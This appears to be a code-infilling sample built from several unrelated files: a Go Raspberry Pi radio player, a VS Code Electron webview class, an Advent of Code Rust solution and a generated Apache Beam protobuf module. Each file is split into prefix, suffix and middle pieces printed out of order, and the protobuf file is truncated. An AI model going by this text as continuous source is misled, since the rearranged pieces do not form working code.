func loadStations(fileName string) []radioStation {
var stations []radioStation
if fileExists(fileName) {
f, err := os.Open(fileName)
check(err)
//noinspection GoUnhandledErrorResult
defer f.Close()
scanner := bufio.NewScanner(f)
nr := 1
for scanner.Scan() {
line := strings.Trim(scanner.Text(), "\n\r")
items := strings.Split(line, ",")
if len(items) == 2 {
stations = append(stations,
radioStation{strconv.Itoa(nr) + " " + strings.TrimSpace(items[0]), strings.TrimSpace(items[1])})
nr++
}
}
check(scanner.Err())
}
if len(stations) == 0 {
stations = append(stations,
radioStation{"RadioHH", "http://stream.radiohamburg.de/rhh-live/mp3-192/linkradiohamburgde"})
stations = append(stations,
radioStation{"Jazz Radio", "http://jazzradio.ice.infomaniak.ch/jazzradio-high.mp3"})
stations = append(stations,
radioStation{"M1.FM Chillout", "http://tuner.m1.fm/chillout.mp3"})
}
return stations
}
func printBitrateVolume(lineNum int, bitrate string, volume string, muted bool) {
var s string
if muted {
volume = "-mute-"
}
if charsPerLine < 20 {
s = fmt.Sprintf("%-10v%8v", bitrate, volume)
} else {
s = fmt.Sprintf("%-10v%10v", bitrate, volume)
}
printLine(lineNum, s, false, true)
}
func isConnected(url string) bool {
_, err := http.Get(url)
if err != nil {
return false
}
return true
}
// does everything to stop the running mplayer and start a new instance with the actual station url
func newStation() {
disp.Clear()
logger.Trace("New station: %s", stations[stationIdx].name)
printLine(0, "-> "+stations[stationIdx].name, false)
printLine(1, "", false)
printLine(2, "", false)
if stationIdx == 0 {
printLine(3, ipAddress, false)
} else {
printLine(3, time.Now().Format("15:04:05 02.01.06"), false)
}
if inPipe != nil {
_, _ = inPipe.Write([]byte("q"))
_ = inPipe.Close()
_ = outPipe.Close()
_ = command.Wait()
}
for {
if readyForMplayer {
break
}
logger.Trace("Waiting for 'readyForMplayer'...")
time.Sleep(time.Second)
}
if bluetoothConnected {
logger.Trace("Using BT volume " + volumeBluetooth)
volume = vol2VolString(volumeBluetooth)
command = exec.Command("mplayer", "-quiet", "-volume", volumeBluetooth, stations[stationIdx].url)
} else {
logger.Trace("Using Analog volume " + volumeAnalog)
volume = vol2VolString(volumeAnalog)
command = exec.Command("mplayer", "-quiet", "-volume", volumeAnalog, stations[stationIdx].url)
}
var err error
inPipe, err = command.StdinPipe()
check(err)
outPipe, err = command.StdoutPipe()
check(err)
err = command.Start()
check(err)
go func() {
pipeChan <- outPipe
}()
debounceWrite(saveStationAndVolumes)
}
func switchBacklightOn() {
disp.Backlight(true)
if *backlightOffPtr {
debounceBacklight(switchBacklightOff)
}
}
func switchBacklightOff() {
disp.Backlight(false)
}
// reads the paired bt devices into an array and signals via 'readyForMplayer' to start the mplayer
func checkBluetooth() {
// init part: get the list of paired bluetooth devices
result, err := exec.Command("bluetoothctl", "devices").Output()
if err != nil {
logger.Error(err.Error())
} else { | for _, s := range arr {
parts := strings.Split(s, " ")
if len(parts) > 1 {
info, err2 := exec.Command("bluetoothctl", "info", parts[1]).Output()
if err2 == nil {
if strings.Contains(string(info), "Audio Sink") {
btDevices = append(btDevices, parts[1])
logger.Info(parts[1])
if strings.Contains(string(info), "Connected: yes") {
logger.Info("BT connected to " + parts[1])
bluetoothConnected = true
}
}
}
}
}
}
readyForMplayer = true
}
// listens for BT events and restarts the mplayer if event detected
func listenForBtChanges() {
lastExitCode := 999
for {
cmd := exec.Command("ls", "/dev/input/event0")
_ = cmd.Run()
exitCode := cmd.ProcessState.ExitCode()
if exitCode == 2 {
// not connected
if lastExitCode == 0 {
logger.Info("Re-run mplayer (2)... ")
bluetoothConnected = false
stationMutex.Lock()
newStation()
stationMutex.Unlock()
}
for _, btDevice := range btDevices {
// logger.Info(fmt.Sprintf("Trying to connect device #%d %s", idx, btDevice))
cmd = exec.Command("bluetoothctl", "connect", btDevice)
_ = cmd.Run()
connectExitCode := cmd.ProcessState.ExitCode()
if connectExitCode == 0 {
logger.Info("Success with device " + btDevice)
break
}
}
} else if exitCode == 0 {
// connected
if lastExitCode == 2 {
logger.Info("Re-run mplayer (0)... ")
bluetoothConnected = true
stationMutex.Lock()
newStation()
stationMutex.Unlock()
}
}
lastExitCode = exitCode
time.Sleep(3 * time.Second)
}
}
// removes unneeded/unwanted strings from the title like " (CDM EDIT)" etc.
func removeNoise(title string) string {
opening := strings.Index(title, "(")
closing := strings.Index(title, ")")
// text must be enclosed by round brackets
if opening >= 0 && closing >= 0 && closing > opening {
remove := false
// fmt.Println("removing noise...")
noise := strings.ToLower(title[opening+1 : closing])
if len(noise) > 0 {
// fmt.Println("noise:", noise)
if strings.Contains(noise, "edit") ||
strings.Contains(noise, "mix") ||
strings.Contains(noise, "cdm") ||
strings.Contains(noise, "cut") ||
strings.Contains(noise, "rmx") ||
strings.Contains(noise, "cover") {
remove = true
}
}
if remove {
title = strings.ReplaceAll(title[:opening]+title[closing+1:], " ", " ")
title = strings.TrimSpace(strings.ReplaceAll(title, " .", ""))
if *debug {
logger.Info("removeNoise: %s", title)
}
}
}
return title
}
func vol2VolString(vol string) string {
var format string
if charsPerLine < 20 {
format = "V %s%%"
} else {
format = "Vol %s%%"
}
return fmt.Sprintf(format, vol)
}
func main() {
homePath = filepath.Join(getHomeDir(), ".piradio")
_ = os.MkdirAll(homePath, os.ModePerm)
config := logger.Config{
LogDir: filepath.Join(homePath, "log"),
LogFileMaxSize: 2,
LogFileMaxNum: 30,
LogFileNumToDel: 3,
LogDest: logger.LogDestFile,
Flag: logger.ControlFlagLogDate,
}
_ = logger.Init(&config)
logger.Trace("Starting piradio...")
logNetworkInterfaces()
// Commandline parameters
camelCasePtr = flag.Bool("camelCase", false, "set to format title")
debug = flag.Bool("debug", false, "set to output mplayer info on stdout")
lcdDelayPtr = flag.Int("lcdDelay", 3, "initial delay for LCD in s (1s...10s)")
noisePtr = flag.Bool("noise", false, "set to remove noise from title")
oledPtr = flag.Bool("oled", false, "set to use OLED Display")
noBluetoothPtr = flag.Bool("noBluetooth", false, "set to only use analog output")
backlightOffPtr = flag.Bool("backlightOff", false, "set to switch off backlight after some time")
backlightOffTimePtr = flag.Int("backlightOffTime", 15, "backlight switch off time in s (3s...3600s)")
scrollSpeedPtr = flag.Int("scrollSpeed", 500, "scroll speed in ms (100ms...10000ms)")
scrollStationPtr = flag.Bool("scrollStation", false, "set to scroll station names")
flag.Parse()
if *backlightOffTimePtr < 3 {
*backlightOffTimePtr = 3
}
if *backlightOffTimePtr > 3600 {
*backlightOffTimePtr = 3600
}
if *scrollSpeedPtr < 100 {
*scrollSpeedPtr = 100
}
if *scrollSpeedPtr > 10000 {
*scrollSpeedPtr = 10000
}
if *lcdDelayPtr < 1 {
*lcdDelayPtr = 1
}
if *lcdDelayPtr > 10 {
*lcdDelayPtr = 10
}
var err error
if *oledPtr {
disp, err = oled.New(*scrollSpeedPtr)
} else {
disp, err = lcd.New(*scrollStationPtr, *scrollSpeedPtr, *lcdDelayPtr)
}
charsPerLine = disp.GetCharsPerLine()
if err != nil {
logger.Error("Couldn't initialize display: %s", err)
}
// Load gpio drivers:
if _, err = host.Init(); err != nil {
check(err)
}
// Lookup pins by their names and set them as input pins with an internal pull up resistor:
pNextStation := gpioreg.ByName("GPIO5")
if pNextStation == nil {
logger.Error("Failed to find GPIO5")
}
if err := pNextStation.In(gpio.PullUp, gpio.NoEdge); err != nil {
check(err)
}
pPrevStation := gpioreg.ByName("GPIO6")
if pPrevStation == nil {
logger.Error("Failed to find GPIO6")
}
if err := pPrevStation.In(gpio.PullUp, gpio.NoEdge); err != nil {
check(err)
}
pVolUp := gpioreg.ByName("GPIO19")
if pVolUp == nil {
logger.Error("Failed to find GPIO19")
}
if err := pVolUp.In(gpio.PullUp, gpio.NoEdge); err != nil {
check(err)
}
pVolDown := gpioreg.ByName("GPIO26")
if pVolDown == nil {
logger.Error("Failed to find GPIO26")
}
if err := pVolDown.In(gpio.PullUp, gpio.NoEdge); err != nil {
check(err)
}
pMuteAudio := gpioreg.ByName("GPIO16")
if pMuteAudio == nil {
logger.Error("Failed to find GPIO16")
}
if err := pMuteAudio.In(gpio.PullUp, gpio.NoEdge); err != nil {
check(err)
}
var statusChan = make(chan string)
var ctrlChan = make(chan os.Signal)
var volumeMutex = &sync.Mutex{}
debounceBtn := debouncer.New(debounceTime * time.Millisecond)
debounceWrite = debouncer.New(debounceWriteToFileTime * time.Second)
debounceBacklight = debouncer.New(time.Duration(*backlightOffTimePtr) * time.Second)
// the following 4 functions handle the pressed buttons
fpPrev := func() {
stationMutex.Lock()
stationIdx-- // previous station
if stationIdx < 0 {
stationIdx = len(stations) - 1
}
newStation()
stationMutex.Unlock()
}
fpNext := func() {
stationMutex.Lock()
stationIdx++ // next station
stationIdx = stationIdx % len(stations)
newStation()
stationMutex.Unlock()
}
fpUp := func() {
volumeMutex.Lock()
_, err = inPipe.Write([]byte("*")) // increase volume
volumeMutex.Unlock()
check(err)
debounceWrite(saveStationAndVolumes)
}
fpDown := func() {
volumeMutex.Lock()
_, err = inPipe.Write([]byte("/")) // decrease volume
volumeMutex.Unlock()
check(err)
debounceWrite(saveStationAndVolumes)
}
fpMute := func() {
volumeMutex.Lock()
_, err = inPipe.Write([]byte("m")) // toggle mute
volumeMutex.Unlock()
check(err)
}
signal.Notify(ctrlChan, os.Interrupt, syscall.SIGTERM, syscall.SIGINT, syscall.SIGKILL)
stations = loadStations(filepath.Join(homePath, "stations"))
stationIdx, volumeAnalog, volumeBluetooth = getStationAndVolumes()
go checkBluetooth()
// this function is polling the GPIO Levels and calls the debouncer when a Low-Level is found (pull up resistor)
go func() {
for {
switch {
case pNextStation.Read() == false:
debounceBtn(fpNext) // next station
switchBacklightOn()
case pPrevStation.Read() == false:
debounceBtn(fpPrev) // previous station
switchBacklightOn()
case pVolUp.Read() == false:
if !muted {
debounceBtn(fpUp) // increase volume
}
switchBacklightOn()
case pVolDown.Read() == false:
if !muted {
debounceBtn(fpDown) // decrease volume
}
switchBacklightOn()
case pMuteAudio.Read() == false:
debounceBtn(fpMute) // toggle mute
switchBacklightOn()
}
time.Sleep(70 * time.Millisecond)
}
}()
// this goroutine is waiting for piradio being stopped
go func() {
<-ctrlChan
logger.Trace("Ctrl+C received... Exiting")
close(statusChan)
close(pipeChan)
os.Exit(1)
}()
switchBacklightOn()
// this goroutine is reading the output from mplayer and feeds the strings into the statusChan
go func() {
for {
outPipe := <-pipeChan
reader := bufio.NewReader(outPipe)
for {
data, err := reader.ReadString('\n')
if err != nil {
statusChan <- "Playing stopped"
logger.Trace("Playing stopped... starting new mplayer in 10s")
time.Sleep(10 * time.Second)
newStation()
break
} else {
statusChan <- data
}
}
}
}()
// Is used for testing if the url is available on startup. This is important, when started via rc.local
// on boot, because the internet connection might not be available yet.
for !isConnected(stations[0].url) {
logger.Trace("URL %s is NOT available", stations[0].url)
time.Sleep(300 * time.Millisecond)
}
fpNext()
if !*noBluetoothPtr {
go listenForBtChanges()
}
// loop for processing the output of mplayer
for {
select {
case line := <-statusChan:
if *debug && len(strings.TrimSpace(line)) > 0 {
fmt.Print("Process output: " + line)
}
if strings.Index(line, "Name") == 0 {
name := strings.Split(line, ":")
if len(name) > 1 {
s := strings.Trim(name[1], " \n")
// logger.Trace("Station: " + s)
printLine(0, s, *scrollStationPtr)
logger.Info("Station: " + s)
currentStation = s
}
}
if strings.Index(line, "ICY Info:") == 0 {
icy2 := line[10:]
st := strings.Split(icy2, ";")
for _, value := range st {
if strings.Index(value, "StreamTitle=") == 0 {
title := value[13 : len(value)-1]
trenner := strings.Index(title, " - ")
if trenner > 0 {
printLine(1, title[:trenner], true)
printLine(2, title[trenner+3:], true)
if strings.TrimSpace(title) != "-" && title != currentStation {
logger.Info("Title: " + title)
}
} else {
printLine(1, title, true)
printLine(2, "", false)
}
}
}
}
if strings.Index(line, "Bitrate") == 0 {
bitrateArr := strings.Split(line, ":")
if len(bitrateArr) > 1 {
bitrate = strings.Trim(bitrateArr[1], " \n")
logger.Trace("Bitrate: " + bitrate)
printBitrateVolume(3, bitrate, volume, muted)
}
}
if strings.Index(line, "Volume:") >= 0 {
volumeArr := strings.Split(line, ":")
if len(volumeArr) > 1 {
v := strings.Split(strings.Trim(volumeArr[1], " \n"), " ")[0]
volume = vol2VolString(v)
logger.Trace("Volume: " + v)
printBitrateVolume(3, bitrate, volume, muted)
if bluetoothConnected {
volumeBluetooth = v
} else {
volumeAnalog = v
}
}
}
if strings.Index(line, "Mute:") >= 0 {
muteArr := strings.Split(line, ":")
if len(muteArr) > 1 {
muted = strings.Contains(muteArr[1], "enabled")
printBitrateVolume(3, bitrate, volume, muted)
}
}
}
}
} | arr := strings.Split(string(result), "\n")
logger.Info("BT Devices paired:") |
webviewElement.ts | /*---------------------------------------------------------------------------------------------
* Copyright (c) Microsoft Corporation. All rights reserved.
* Licensed under the MIT License. See License.txt in the project root for license information.
*--------------------------------------------------------------------------------------------*/
import { FindInPageOptions, WebviewTag } from 'electron';
import { addDisposableListener } from 'vs/base/browser/dom';
import { ThrottledDelayer } from 'vs/base/common/async';
import { Emitter, Event } from 'vs/base/common/event';
import { once } from 'vs/base/common/functional';
import { IDisposable } from 'vs/base/common/lifecycle';
import { FileAccess, Schemas } from 'vs/base/common/network';
import { IConfigurationService } from 'vs/platform/configuration/common/configuration';
import { IFileService } from 'vs/platform/files/common/files';
import { IInstantiationService } from 'vs/platform/instantiation/common/instantiation';
import { IMainProcessService } from 'vs/platform/ipc/electron-sandbox/services';
import { ILogService } from 'vs/platform/log/common/log';
import { INotificationService } from 'vs/platform/notification/common/notification';
import { IRemoteAuthorityResolverService } from 'vs/platform/remote/common/remoteAuthorityResolver';
import { ITunnelService } from 'vs/platform/remote/common/tunnel';
import { IRequestService } from 'vs/platform/request/common/request';
import { ITelemetryService } from 'vs/platform/telemetry/common/telemetry';
import { webviewPartitionId } from 'vs/platform/webview/common/resourceLoader';
import { BaseWebview, WebviewMessageChannels } from 'vs/workbench/contrib/webview/browser/baseWebviewElement';
import { WebviewThemeDataProvider } from 'vs/workbench/contrib/webview/browser/themeing';
import { Webview, WebviewContentOptions, WebviewExtensionDescription, WebviewOptions } from 'vs/workbench/contrib/webview/browser/webview';
import { WebviewFindDelegate, WebviewFindWidget } from 'vs/workbench/contrib/webview/browser/webviewFindWidget';
import { WebviewIgnoreMenuShortcutsManager } from 'vs/workbench/contrib/webview/electron-browser/webviewIgnoreMenuShortcutsManager';
import { rewriteVsCodeResourceUrls } from 'vs/workbench/contrib/webview/electron-sandbox/resourceLoading';
import { IWorkbenchEnvironmentService } from 'vs/workbench/services/environment/common/environmentService';
export class ElectronWebviewBasedWebview extends BaseWebview<WebviewTag> implements Webview, WebviewFindDelegate {
private static _webviewKeyboardHandler: WebviewIgnoreMenuShortcutsManager | undefined;
private static getWebviewKeyboardHandler(
configService: IConfigurationService,
mainProcessService: IMainProcessService,
) {
if (!this._webviewKeyboardHandler) {
this._webviewKeyboardHandler = new WebviewIgnoreMenuShortcutsManager(configService, mainProcessService);
}
return this._webviewKeyboardHandler;
}
private _webviewFindWidget: WebviewFindWidget | undefined;
private _findStarted: boolean = false;
private readonly _focusDelayer = this._register(new ThrottledDelayer(10));
private _elementFocusImpl!: (options?: FocusOptions | undefined) => void;
constructor(
id: string,
options: WebviewOptions,
contentOptions: WebviewContentOptions,
extension: WebviewExtensionDescription | undefined,
private readonly _webviewThemeDataProvider: WebviewThemeDataProvider,
@ILogService private readonly _myLogService: ILogService,
@IInstantiationService instantiationService: IInstantiationService,
@ITelemetryService telemetryService: ITelemetryService,
@IWorkbenchEnvironmentService environmentService: IWorkbenchEnvironmentService,
@IConfigurationService configurationService: IConfigurationService,
@IMainProcessService mainProcessService: IMainProcessService,
@INotificationService notificationService: INotificationService,
@IFileService fileService: IFileService,
@IRequestService requestService: IRequestService, | notificationService,
logService: _myLogService,
telemetryService,
environmentService,
fileService,
requestService,
tunnelService,
remoteAuthorityResolverService
});
/* __GDPR__
"webview.createWebview" : {
"extension": { "classification": "SystemMetaData", "purpose": "FeatureInsight" },
"enableFindWidget": { "classification": "SystemMetaData", "purpose": "FeatureInsight", "isMeasurement": true },
"webviewElementType": { "classification": "SystemMetaData", "purpose": "FeatureInsight", "isMeasurement": true }
}
*/
telemetryService.publicLog('webview.createWebview', {
enableFindWidget: !!options.enableFindWidget,
extension: extension?.id.value,
webviewElementType: 'webview',
});
this._myLogService.debug(`Webview(${this.id}): init`);
this._register(addDisposableListener(this.element!, 'dom-ready', once(() => {
this._register(ElectronWebviewBasedWebview.getWebviewKeyboardHandler(configurationService, mainProcessService).add(this.element!));
})));
this._register(addDisposableListener(this.element!, 'console-message', function (e: { level: number; message: string; line: number; sourceId: string; }) {
console.log(`[Embedded Page] ${e.message}`);
}));
this._register(addDisposableListener(this.element!, 'dom-ready', () => {
this._myLogService.debug(`Webview(${this.id}): dom-ready`);
// Workaround for https://github.com/electron/electron/issues/14474
if (this.element && (this.isFocused || document.activeElement === this.element)) {
this.element.blur();
this.element.focus();
}
}));
this._register(addDisposableListener(this.element!, 'crashed', () => {
console.error('embedded page crashed');
}));
this._register(this.on('synthetic-mouse-event', (rawEvent: any) => {
if (!this.element) {
return;
}
const bounds = this.element.getBoundingClientRect();
try {
window.dispatchEvent(new MouseEvent(rawEvent.type, {
...rawEvent,
clientX: rawEvent.clientX + bounds.left,
clientY: rawEvent.clientY + bounds.top,
}));
return;
} catch {
// CustomEvent was treated as MouseEvent so don't do anything - https://github.com/microsoft/vscode/issues/78915
return;
}
}));
this._register(this.on('did-set-content', () => {
this._myLogService.debug(`Webview(${this.id}): did-set-content`);
if (this.element) {
this.element.style.flex = '';
this.element.style.width = '100%';
this.element.style.height = '100%';
}
}));
this._register(addDisposableListener(this.element!, 'devtools-opened', () => {
this._send('devtools-opened');
}));
if (options.enableFindWidget) {
this._webviewFindWidget = this._register(instantiationService.createInstance(WebviewFindWidget, this));
this._register(addDisposableListener(this.element!, 'found-in-page', e => {
this._hasFindResult.fire(e.result.matches > 0);
}));
this.styledFindWidget();
}
// We must ensure to put a `file:` URI as the preload attribute
// and not the `vscode-file` URI because preload scripts are loaded
// via node.js from the main side and only allow `file:` protocol
this.element!.preload = FileAccess.asFileUri('./pre/electron-index.js', require).toString(true);
this.element!.src = `${Schemas.vscodeWebview}://${this.id}/electron-browser-index.html?platform=electron&id=${this.id}&vscode-resource-origin=${encodeURIComponent(this.webviewResourceEndpoint)}`;
}
protected createElement(options: WebviewOptions) {
// Do not start loading the webview yet.
// Wait the end of the ctor when all listeners have been hooked up.
const element = document.createElement('webview');
this._elementFocusImpl = element.focus.bind(element);
element.focus = () => {
this.doFocus();
};
element.setAttribute('partition', webviewPartitionId);
element.setAttribute('webpreferences', 'contextIsolation=yes');
element.className = `webview ${options.customClasses || ''}`;
element.style.flex = '0 1';
element.style.width = '0';
element.style.height = '0';
element.style.outline = '0';
return element;
}
public override set contentOptions(options: WebviewContentOptions) {
this._myLogService.debug(`Webview(${this.id}): will set content options`);
super.contentOptions = options;
}
private get webviewResourceEndpoint(): string {
return `https://${this.id}.vscode-webview-test.com`;
}
protected readonly extraContentOptions = {};
public override set html(value: string) {
this._myLogService.debug(`Webview(${this.id}): will set html`);
super.html = rewriteVsCodeResourceUrls(this.id, value);
}
public mountTo(parent: HTMLElement) {
if (!this.element) {
return;
}
if (this._webviewFindWidget) {
parent.appendChild(this._webviewFindWidget.getDomNode()!);
}
parent.appendChild(this.element);
}
protected async doPostMessage(channel: string, data?: any): Promise<void> {
this._myLogService.debug(`Webview(${this.id}): did post message on '${channel}'`);
this.element?.send(channel, data);
}
public focus(): void {
this.doFocus();
// Handle focus change programmatically (do not rely on event from <webview>)
this.handleFocusChange(true);
}
private doFocus() {
if (!this.element) {
return;
}
// Clear the existing focus first if not already on the webview.
// This is required because the next part where we set the focus is async.
if (document.activeElement && document.activeElement instanceof HTMLElement && document.activeElement !== this.element) {
// Don't blur if on the webview because this will also happen async and may unset the focus
// after the focus trigger fires below.
document.activeElement.blur();
}
// Workaround for https://github.com/microsoft/vscode/issues/75209
// Electron's webview.focus is async so for a sequence of actions such as:
//
// 1. Open webview
// 1. Show quick pick from command palette
//
// We end up focusing the webview after showing the quick pick, which causes
// the quick pick to instantly dismiss.
//
// Workaround this by debouncing the focus and making sure we are not focused on an input
// when we try to re-focus.
this._focusDelayer.trigger(async () => {
if (!this.isFocused || !this.element) {
return;
}
if (document.activeElement && document.activeElement?.tagName !== 'BODY') {
return;
}
try {
this._elementFocusImpl();
} catch {
// noop
}
this._send('focus');
});
}
protected override style(): void {
super.style();
this.styledFindWidget();
}
private styledFindWidget() {
this._webviewFindWidget?.updateTheme(this._webviewThemeDataProvider.getTheme());
}
private readonly _hasFindResult = this._register(new Emitter<boolean>());
public readonly hasFindResult: Event<boolean> = this._hasFindResult.event;
public startFind(value: string, options?: FindInPageOptions) {
if (!value || !this.element) {
return;
}
// ensure options is defined without modifying the original
options = options || {};
// FindNext must be false for a first request
const findOptions: FindInPageOptions = {
forward: options.forward,
findNext: true,
matchCase: options.matchCase,
medialCapitalAsWordStart: options.medialCapitalAsWordStart
};
this._findStarted = true;
this.element.findInPage(value, findOptions);
}
/**
* Webviews expose a stateful find API.
* Successive calls to find will move forward or backward through onFindResults
* depending on the supplied options.
*
* @param value The string to search for. Empty strings are ignored.
*/
public find(value: string, previous: boolean): void {
if (!this.element) {
return;
}
// Searching with an empty value will throw an exception
if (!value) {
return;
}
const options = { findNext: false, forward: !previous };
if (!this._findStarted) {
this.startFind(value, options);
return;
}
this.element.findInPage(value, options);
}
public stopFind(keepSelection?: boolean): void {
this._hasFindResult.fire(false);
if (!this.element) {
return;
}
this._findStarted = false;
this.element.stopFindInPage(keepSelection ? 'keepSelection' : 'clearSelection');
}
public showFind() {
this._webviewFindWidget?.reveal();
}
public hideFind() {
this._webviewFindWidget?.hide();
}
public runFindAction(previous: boolean) {
this._webviewFindWidget?.find(previous);
}
public override selectAll() {
this.element?.selectAll();
}
public override copy() {
this.element?.copy();
}
public override paste() {
this.element?.paste();
}
public override cut() {
this.element?.cut();
}
public override undo() {
this.element?.undo();
}
public override redo() {
this.element?.redo();
}
protected override on<T = unknown>(channel: WebviewMessageChannels | string, handler: (data: T) => void): IDisposable {
if (!this.element) {
throw new Error('Cannot add event listener. No webview element found.');
}
return addDisposableListener(this.element, 'ipc-message', (event) => {
if (!this.element) {
return;
}
if (event.channel === channel && event.args && event.args.length) {
handler(event.args[0]);
}
});
}
} | @ITunnelService tunnelService: ITunnelService,
@IRemoteAuthorityResolverService remoteAuthorityResolverService: IRemoteAuthorityResolverService,
) {
super(id, options, contentOptions, extension, _webviewThemeDataProvider, { |
part2.rs | use std::collections::HashMap;
fn get_max(memory: &[usize]) -> (usize, usize) {
let mut idx = 0usize;
let mut value = 0usize;
for (idx0, value0) in memory.iter().enumerate() {
if value0 > &value {
value = *value0;
idx = idx0;
}
}
(idx, value)
}
pub fn | (data: &str) -> usize {
let mut memory: Vec<usize> = data.split_whitespace().map(|x| x.parse::<usize>().unwrap()).collect();
let mut cycles: HashMap<Vec<usize>, usize> = HashMap::new();
let mut steps = 0usize;
loop {
let (idx, mut left) = get_max(&memory);
memory[idx] = 0;
let mut next_idx = idx + 1;
loop {
if left == 0 {
break;
}
if next_idx >= memory.len() {
next_idx = 0;
}
memory[next_idx] += 1;
left -= 1;
next_idx += 1;
}
if cycles.contains_key(&memory) {
let prev_steps = cycles.get(&memory).unwrap();
return steps - prev_steps;
} else {
cycles.insert(memory.clone(), steps);
}
steps += 1;
}
}
#[cfg(test)]
mod tests {
use super::parse;
#[test]
fn day06_part1_test1() {
let data = "0 2 7 0";
assert_eq!(4, parse(data));
}
}
| parse |
beam_runner_api_pb2.py | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: beam_runner_api.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import any_pb2 as google_dot_protobuf_dot_any__pb2
from google.protobuf import descriptor_pb2 as google_dot_protobuf_dot_descriptor__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='beam_runner_api.proto',
package='org.apache.beam.model.pipeline.v1',
syntax='proto3',
serialized_pb=_b('\n\x15\x62\x65\x61m_runner_api.proto\x12!org.apache.beam.model.pipeline.v1\x1a\x19google/protobuf/any.proto\x1a google/protobuf/descriptor.proto\"\xc2\x01\n\rBeamConstants\"\xb0\x01\n\tConstants\x12\x31\n\x14MIN_TIMESTAMP_MILLIS\x10\x00\x1a\x17\xaa\xb4\xfa\xc2\x05\x11-9223372036854775\x12\x30\n\x14MAX_TIMESTAMP_MILLIS\x10\x01\x1a\x16\xaa\xb4\xfa\xc2\x05\x10\x39\x32\x32\x33\x33\x37\x32\x30\x33\x36\x38\x35\x34\x37\x37\x35\x12>\n\"GLOBAL_WINDOW_MAX_TIMESTAMP_MILLIS\x10\x02\x1a\x16\xaa\xb4\xfa\xc2\x05\x10\x39\x32\x32\x33\x33\x37\x31\x39\x35\x30\x34\x35\x34\x37\x37\x35\"\xb5\x07\n\nComponents\x12Q\n\ntransforms\x18\x01 \x03(\x0b\x32=.org.apache.beam.model.pipeline.v1.Components.TransformsEntry\x12U\n\x0cpcollections\x18\x02 \x03(\x0b\x32?.org.apache.beam.model.pipeline.v1.Components.PcollectionsEntry\x12\x64\n\x14windowing_strategies\x18\x03 \x03(\x0b\x32\x46.org.apache.beam.model.pipeline.v1.Components.WindowingStrategiesEntry\x12I\n\x06\x63oders\x18\x04 \x03(\x0b\x32\x39.org.apache.beam.model.pipeline.v1.Components.CodersEntry\x12U\n\x0c\x65nvironments\x18\x05 \x03(\x0b\x32?.org.apache.beam.model.pipeline.v1.Components.EnvironmentsEntry\x1a`\n\x0fTransformsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12<\n\x05value\x18\x02 \x01(\x0b\x32-.org.apache.beam.model.pipeline.v1.PTransform:\x02\x38\x01\x1a\x63\n\x11PcollectionsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12=\n\x05value\x18\x02 \x01(\x0b\x32..org.apache.beam.model.pipeline.v1.PCollection:\x02\x38\x01\x1ap\n\x18WindowingStrategiesEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\x43\n\x05value\x18\x02 \x01(\x0b\x32\x34.org.apache.beam.model.pipeline.v1.WindowingStrategy:\x02\x38\x01\x1aW\n\x0b\x43odersEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\x37\n\x05value\x18\x02 \x01(\x0b\x32(.org.apache.beam.model.pipeline.v1.Coder:\x02\x38\x01\x1a\x63\n\x11\x45nvironmentsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12=\n\x05value\x18\x02 \x01(\x0b\x32..org.apache.beam.model.pipeline.v1.Environment:\x02\x38\x01\"\xaf\x01\n\x08Pipeline\x12\x41\n\ncomponents\x18\x01 \x01(\x0b\x32-.org.apache.beam.model.pipeline.v1.Components\x12\x1a\n\x12root_transform_ids\x18\x02 \x03(\t\x12\x44\n\x0c\x64isplay_data\x18\x03 \x01(\x0b\x32..org.apache.beam.model.pipeline.v1.DisplayData\"\xb4\x03\n\nPTransform\x12\x13\n\x0bunique_name\x18\x05 \x01(\t\x12=\n\x04spec\x18\x01 \x01(\x0b\x32/.org.apache.beam.model.pipeline.v1.FunctionSpec\x12\x15\n\rsubtransforms\x18\x02 \x03(\t\x12I\n\x06inputs\x18\x03 \x03(\x0b\x32\x39.org.apache.beam.model.pipeline.v1.PTransform.InputsEntry\x12K\n\x07outputs\x18\x04 \x03(\x0b\x32:.org.apache.beam.model.pipeline.v1.PTransform.OutputsEntry\x12\x44\n\x0c\x64isplay_data\x18\x06 \x01(\x0b\x32..org.apache.beam.model.pipeline.v1.DisplayData\x1a-\n\x0bInputsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\x1a.\n\x0cOutputsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"\xd0\r\n\x13StandardPTransforms\"\xb1\x03\n\nPrimitives\x12-\n\x06PAR_DO\x10\x00\x1a!\xa2\xb4\xfa\xc2\x05\x1burn:beam:transform:pardo:v1\x12,\n\x07\x46LATTEN\x10\x01\x1a\x1f\xa2\xb4\xfa\xc2\x05\x19\x62\x65\x61m:transform:flatten:v1\x12\x36\n\x0cGROUP_BY_KEY\x10\x02\x1a$\xa2\xb4\xfa\xc2\x05\x1e\x62\x65\x61m:transform:group_by_key:v1\x12,\n\x07IMPULSE\x10\x03\x1a\x1f\xa2\xb4\xfa\xc2\x05\x19\x62\x65\x61m:transform:impulse:v1\x12\x37\n\x0e\x41SSIGN_WINDOWS\x10\x04\x1a#\xa2\xb4\xfa\xc2\x05\x1d\x62\x65\x61m:transform:window_into:v1\x12\x37\n\x0bTEST_STREAM\x10\x05\x1a&\xa2\xb4\xfa\xc2\x05 